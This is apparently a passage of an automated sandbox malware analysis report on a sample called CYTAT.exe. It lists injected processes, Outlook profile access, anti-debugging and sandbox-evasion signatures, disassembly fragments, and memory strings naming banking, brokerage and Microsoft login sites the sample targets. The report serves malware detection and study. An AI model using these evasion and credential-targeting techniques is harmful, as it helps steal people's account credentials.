            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\CYTAT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: CYTAT.exeStatic file information: File size 1357205 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eMNaOgRkIZi.exe, 0000000A.00000002.3104267331.00000000009FE000.00000002.00000001.01000000.00000005.sdmp, eMNaOgRkIZi.exe, 0000000D.00000000.1543340144.00000000009FE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: CYTAT.exe, 00000000.00000003.1270333270.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, CYTAT.exe, 00000000.00000003.1269128308.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1379552936.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1475859271.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1377556936.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1475859271.0000000003500000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000003.1473681751.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000003.1478081756.000000000302B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3106719686.000000000337E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3106719686.00000000031E0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CYTAT.exe, 00000000.00000003.1270333270.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, CYTAT.exe, 00000000.00000003.1269128308.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000003.1379552936.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1475859271.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1377556936.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1475859271.0000000003500000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 0000000C.00000003.1473681751.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000003.1478081756.000000000302B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3106719686.000000000337E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3106719686.00000000031E0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000004.00000002.1472771099.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1441411393.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000A.00000003.1418262002.00000000008FB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3107256962.000000000380C000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000000.1543628726.000000000292C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1913472378.00000000255EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3107256962.000000000380C000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000000.1543628726.000000000292C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1913472378.00000000255EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000004.00000002.1472771099.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1441411393.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000A.00000003.1418262002.00000000008FB000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: CYTAT.exeStatic PE information: real checksum: 0xa961f should be: 0x14e3fb
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00403060 push eax; ret 4_2_00403062
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004160FC push 00000030h; retf 4_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041789B push C5503231h; retf 4_2_004178A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041613C push 00000030h; retf 4_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040D211 pushad ; ret 4_2_0040D212
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004132A3 push esi; ret 4_2_004132A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041136F push edi; retf 4_2_00411372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00417CFB push 789F05E2h; iretd 4_2_00417D02
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004135D8 push ds; retf 4_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004135E3 push ds; retf 4_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00414594 push edi; retf 4_2_004145B7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041E67B push ebp; retf 4_2_0041E67D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041E61E push eax; retf 4_2_0041E647
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041E6DA pushad ; ret 4_2_0041E6DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004016F6 push ss; ret 4_2_00401859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00417FCB push edx; iretd 4_2_00417FCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00401FF6 push ecx; ret 4_2_00401FFF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035309AD push ecx; mov dword ptr [esp], ecx4_2_035309B6
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F430A push edi; retf 10_2_033F430D
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F623E push esi; ret 10_2_033F6243
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F01AC pushad ; ret 10_2_033F01AD
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033FA836 push C5503231h; retf 10_2_033FA83E
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F9097 push 00000030h; retf 10_2_033F90E4
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F90D7 push 00000030h; retf 10_2_033F90E4
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033FAF66 push edx; iretd 10_2_033FAF68
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_03401675 pushad ; ret 10_2_03401676
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_03401616 push ebp; retf 10_2_03401618
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F752F push edi; retf 10_2_033F7552
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F657E push ds; retf 10_2_033F658B
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F6573 push ds; retf 10_2_033F658B
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\CYTAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\CYTAT.exeAPI/Special instruction interceptor: Address: 3FC2374
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0357096E rdtsc 4_2_0357096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 4628Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 5345Jump to behavior
            Source: C:\Users\user\Desktop\CYTAT.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87584
            Source: C:\Users\user\Desktop\CYTAT.exeAPI coverage: 3.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7564Thread sleep count: 4628 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7564Thread sleep time: -9256000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7564Thread sleep count: 5345 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7564Thread sleep time: -10690000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe TID: 7592Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe TID: 7592Thread sleep time: -37500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A1C2C0 FindFirstFileW,FindNextFileW,FindClose,12_2_00A1C2C0
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: netbtugc.exe, 0000000C.00000002.3109478398.0000000007C65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,116U
            Source: 01194HH4.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: 01194HH4.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: netbtugc.exe, 0000000C.00000002.3109478398.0000000007C65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Mozilla Firefox\Firefox.exeVMware[
            Source: 01194HH4.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 01194HH4.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: 01194HH4.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: 01194HH4.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: AMC password management pageVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: netbtugc.exe, 0000000C.00000002.3109478398.0000000007C65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696492231^
            Source: netbtugc.exe, 0000000C.00000002.3109478398.0000000007C65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware[
            Source: 01194HH4.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: 01194HH4.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: 01194HH4.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: 01194HH4.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: 01194HH4.12.drBinary or memory string: discord.comVMware20,11696492231f
            Source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.1914781847.000001E2654FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: netbtugc.exe, 0000000C.00000002.3109478398.0000000007C65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20G
            Source: 01194HH4.12.drBinary or memory string: global block list test formVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: 01194HH4.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: 01194HH4.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: CYTAT.exe, 00000000.00000002.1272397417.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
            Source: 01194HH4.12.drBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 01194HH4.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: eMNaOgRkIZi.exe, 0000000D.00000002.3105721712.0000000000ACF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
            Source: 01194HH4.12.drBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: 01194HH4.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: 01194HH4.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 01194HH4.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: 01194HH4.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: 01194HH4.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: C:\Users\user\Desktop\CYTAT.exeAPI call chain: ExitProcess graph end nodegraph_0-86709
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0357096E rdtsc 4_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004172B3 LdrLoadDll,4_2_004172B3
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_03FC2640 mov eax, dword ptr fs:[00000030h]0_2_03FC2640
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_03FC25E0 mov eax, dword ptr fs:[00000030h]0_2_03FC25E0
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_03FC0FB0 mov eax, dword ptr fs:[00000030h]0_2_03FC0FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B035C mov eax, dword ptr fs:[00000030h]4_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B035C mov eax, dword ptr fs:[00000030h]4_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B035C mov eax, dword ptr fs:[00000030h]4_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B035C mov ecx, dword ptr fs:[00000030h]4_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B035C mov eax, dword ptr fs:[00000030h]4_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B035C mov eax, dword ptr fs:[00000030h]4_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FA352 mov eax, dword ptr fs:[00000030h]4_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D8350 mov ecx, dword ptr fs:[00000030h]4_2_035D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D437C mov eax, dword ptr fs:[00000030h]4_2_035D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352C310 mov ecx, dword ptr fs:[00000030h]4_2_0352C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03550310 mov ecx, dword ptr fs:[00000030h]4_2_03550310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356A30B mov eax, dword ptr fs:[00000030h]4_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356A30B mov eax, dword ptr fs:[00000030h]4_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356A30B mov eax, dword ptr fs:[00000030h]4_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE3DB mov eax, dword ptr fs:[00000030h]4_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE3DB mov eax, dword ptr fs:[00000030h]4_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE3DB mov ecx, dword ptr fs:[00000030h]4_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE3DB mov eax, dword ptr fs:[00000030h]4_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D43D4 mov eax, dword ptr fs:[00000030h]4_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D43D4 mov eax, dword ptr fs:[00000030h]4_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035EC3CD mov eax, dword ptr fs:[00000030h]4_2_035EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A3C0 mov eax, dword ptr fs:[00000030h]4_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A3C0 mov eax, dword ptr fs:[00000030h]4_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A3C0 mov eax, dword ptr fs:[00000030h]4_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A3C0 mov eax, dword ptr fs:[00000030h]4_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A3C0 mov eax, dword ptr fs:[00000030h]4_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A3C0 mov eax, dword ptr fs:[00000030h]4_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035383C0 mov eax, dword ptr fs:[00000030h]4_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035383C0 mov eax, dword ptr fs:[00000030h]4_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035383C0 mov eax, dword ptr fs:[00000030h]4_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035383C0 mov eax, dword ptr fs:[00000030h]4_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B63C0 mov eax, dword ptr fs:[00000030h]4_2_035B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354E3F0 mov eax, dword ptr fs:[00000030h]4_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354E3F0 mov eax, dword ptr fs:[00000030h]4_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354E3F0 mov eax, dword ptr fs:[00000030h]4_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035663FF mov eax, dword ptr fs:[00000030h]4_2_035663FF
